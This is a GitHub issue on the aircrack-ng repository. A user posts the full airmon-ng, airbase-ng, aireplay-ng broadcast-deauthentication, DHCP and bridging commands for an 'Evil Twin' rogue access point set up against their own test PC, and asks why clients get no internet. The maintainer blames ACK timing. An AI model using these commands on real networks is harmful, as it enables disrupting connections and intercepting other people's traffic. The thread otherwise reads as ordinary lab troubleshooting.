Skip to content
This repository has been archived by the owner on Mar 11, 2018. It is now read-only.

Can't Get My Experimental PC to Connect to the AP using airebase-ng #158

Open
asciiterminal opened this issue Jan 26, 2018 · 1 comment
Open

Can't Get My Experimental PC to Connect to the AP using airebase-ng #158

asciiterminal opened this issue Jan 26, 2018 · 1 comment
Labels
bug

Comments

@asciiterminal
Copy link

I have been working around the Evil Twin Airbase-ng for quite a while and i am unable to get my victim PC which is my other windows 10 machine to connect; It did connect to the AP once and when it did it had no internet connect which has kept me up for sometime, i am going to post the proccess i have performed please go through them and guide me through the issue.

Note:i have trued iptables and echo 1 it didnt help

Setting up USB Adapter TP-LINK TL-WN722N Version 1 to monitor mode
airmon-ng start wlan0

Checking for background proccesses that can interfere with the work
airmon-ng check wlan0mon(assigned new name)

Setting up the Fake AP
airbase-ng -a 72:02:71:73:0D:B6 --essid Ryan -c 1 wlan0mon
17:19:25 Created tap interface at0
17:19:25 Trying to set MTU on at0 to 1500
17:19:25 Trying to set MTU on wlan0mon to 1800
17:19:25 Access Point with BSSID 72:02:71:73:0D:B6 started.
17:19:40 Client D0:13:FD:07:79:07 associated (WPA2;CCMP) to ESSID: "Ryan"
17:19:41 Client 20:16:D8:F4:0D:98 associated (WPA2;CCMP) to ESSID: "Ryan"
17:19:57 Client 20:16:D8:F4:0D:98 associated (unencrypted) to ESSID: "Ryan"
17:20:03 Client 20:16:D8:F4:0D:98 associated (unencrypted) to ESSID: "Ryan"

Deauthorizing clients on another terminal

aireplay-ng -0 0 -a 72:02:71:73:0D:B6 wlan0mon
17:22:11 Waiting for beacon frame (BSSID: 72:02:71:73:0D:B6) on channel 1
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
17:22:11 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6
17:22:11 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6
17:22:12 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6
17:22:12 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6
17:22:13 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6
17:22:13 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6
17:22:14 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6
17:22:14 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6
17:22:15 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6

Installing DHCP server
apt-get install isc-dhcp-server
Reading package lists... Done
Building dependency tree
Reading state information... Done
isc-dhcp-server is already the newest version (4.3.5-3+b1).
The following packages were automatically installed and are no longer required:
casefile dconf-editor dconf-tools dissy gir1.2-nm-1.0 libbind9-140
libblas-common libcdio-cdda1 libcdio-paranoia1 libcdio13 libdns162 libemu2
libfwupd1 libgom-1.0-common libgtkspell3-3-0 libhttp-parser2.1 libisc160
libisccfg140 libllvm3.9 liblouis12 liblwgeom-2.3-0 libmozjs-24-0
libopencv-calib3d2.4v5 libopencv-core2.4v5 libopencv-features2d2.4v5
libopencv-flann2.4v5 libopencv-highgui2.4-deb0 libopencv-imgproc2.4v5
libopencv-objdetect2.4v5 libopencv-video2.4v5 libpython3.5
libpython3.5-minimal libpython3.5-stdlib libqcustomplot1.3
libqgis-core2.14.18 libqgis-gui2.14.18 libqgis-networkanalysis2.14.18
libqgispython2.14.18 libradare2-1.6 libtracker-control-1.0-0
libtracker-miner-1.0-0 libtracker-sparql-1.0-0 libva-drm1 libva-x11-1 libva1
maltegoce peepdf python-brotlipy python-pylibemu python-rsvg python-unicorn
python3.5 python3.5-minimal tcpd
Use 'apt autoremove' to remove them.
0 upgraded, 0 newly installed, 0 to remove and 30 not upgraded.

Configuring nano /etc/dhcp/dhcpd.conf

authoritative;
subnet 192.168.1.0 netmask 255.255.255.0
{

option broadcast-address 192.168.1.255;
option routers 192.168.1.1;
option domain-name-servers 8.8.8.8;
range 192.168.1.10 192.168.1.200;
default-lease-time 600;
max-lease-time 7200;

}

Installing bridging utilities

apt-get install bridge-utils
Reading package lists... Done
Building dependency tree
Reading state information... Done
bridge-utils is already the newest version (1.5-14).
The following packages were automatically installed and are no longer required:
casefile dconf-editor dconf-tools dissy gir1.2-nm-1.0 libbind9-140
libblas-common libcdio-cdda1 libcdio-paranoia1 libcdio13 libdns162 libemu2
libfwupd1 libgom-1.0-common libgtkspell3-3-0 libhttp-parser2.1 libisc160
libisccfg140 libllvm3.9 liblouis12 liblwgeom-2.3-0 libmozjs-24-0
libopencv-calib3d2.4v5 libopencv-core2.4v5 libopencv-features2d2.4v5
libopencv-flann2.4v5 libopencv-highgui2.4-deb0 libopencv-imgproc2.4v5
libopencv-objdetect2.4v5 libopencv-video2.4v5 libpython3.5
libpython3.5-minimal libpython3.5-stdlib libqcustomplot1.3
libqgis-core2.14.18 libqgis-gui2.14.18 libqgis-networkanalysis2.14.18
libqgispython2.14.18 libradare2-1.6 libtracker-control-1.0-0
libtracker-miner-1.0-0 libtracker-sparql-1.0-0 libva-drm1 libva-x11-1 libva1
maltegoce peepdf python-brotlipy python-pylibemu python-rsvg python-unicorn
python3.5 python3.5-minimal tcpd
Use 'apt autoremove' to remove them.
0 upgraded, 0 newly installed, 0 to remove and 30 not upgraded.

Bridging interface
root@kali:# brctl addbr evil \Name of the bridge i made
root@kali:# brctl addif evil eth0 \my ethernet connection
root@kali:# brctl addif evil at0
root@kali:# ifconfig at0 0.0.0.0 up
root@kali:# ifconfig evil up
Starting DHCP server
root@kali:# systemctl start smbd.service
root@kali:~# dhclient evil

root@kali:# service isc-dhcp-server restart
root@kali:# service isc-dhcp-server status
? isc-dhcp-server.service - LSB: DHCP server
Loaded: loaded (/etc/init.d/isc-dhcp-server; generated; vendor preset: disabled)
Active: active (running) since Wed 2017-12-06 17:32:35 EST; 6s ago
Docs: man:systemd-sysv-generator(8)
Process: 2049 ExecStart=/etc/init.d/isc-dhcp-server start (code=exited, status=0/SUCCESS)
Tasks: 1 (limit: 4915)
CGroup: /system.slice/isc-dhcp-server.service
+-2061 /usr/sbin/dhcpd -4 -q -cf /etc/dhcp/dhcpd.conf eth0

Dec 06 17:32:33 kali systemd1: Starting LSB: DHCP server...
Dec 06 17:32:33 kali isc-dhcp-server2049: Launching IPv4 server only.
Dec 06 17:32:33 kali dhcpd2060: Wrote 11 leases to leases file.
Dec 06 17:32:33 kali dhcpd2060: Multiple interfaces match the same subnet: eth0 evil
Dec 06 17:32:33 kali dhcpd2060: Multiple interfaces match the same shared network: eth0 evil
Dec 06 17:32:33 kali dhcpd2061: Server starting service.
Dec 06 17:32:35 kali isc-dhcp-server2049: Starting ISC DHCPv4 server: dhcpd.
Dec 06 17:32:35 kali systemd1: Started LSB: DHCP server.

/etc/init.d/isc-dhcp-server start
ok Starting isc-dhcp-server (via systemctl): isc-dhcp-server.service.

IP gateway

root@kali:~# route -n
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
0.0.0.0 192.168.1.1 0.0.0.0 UG 100 0 0 eth0
0.0.0.0 192.168.1.1 0.0.0.0 UG 600 0 0 wlan0
192.168.1.0 0.0.0.0 255.255.255.0 U 100 0 0 eth0
192.168.1.0 0.0.0.0 255.255.255.0 U 600 0 0 wlan0

I have tried the method explained here
and yet either i can't connect to the Fake AP or when i do there is no internet
@aircrack-ng
Copy link
Owner

It is due to ACK timing. Software is not fast enough to do it. A different type of monitor interface need to be used airbase-ng needs to be changed to handle that.

@aircrack-ng aircrack-ng mentioned this issue Feb 19, 2018
Closed
Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Assignees
No one assigned
Labels
bug
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@aircrack-ng @asciiterminal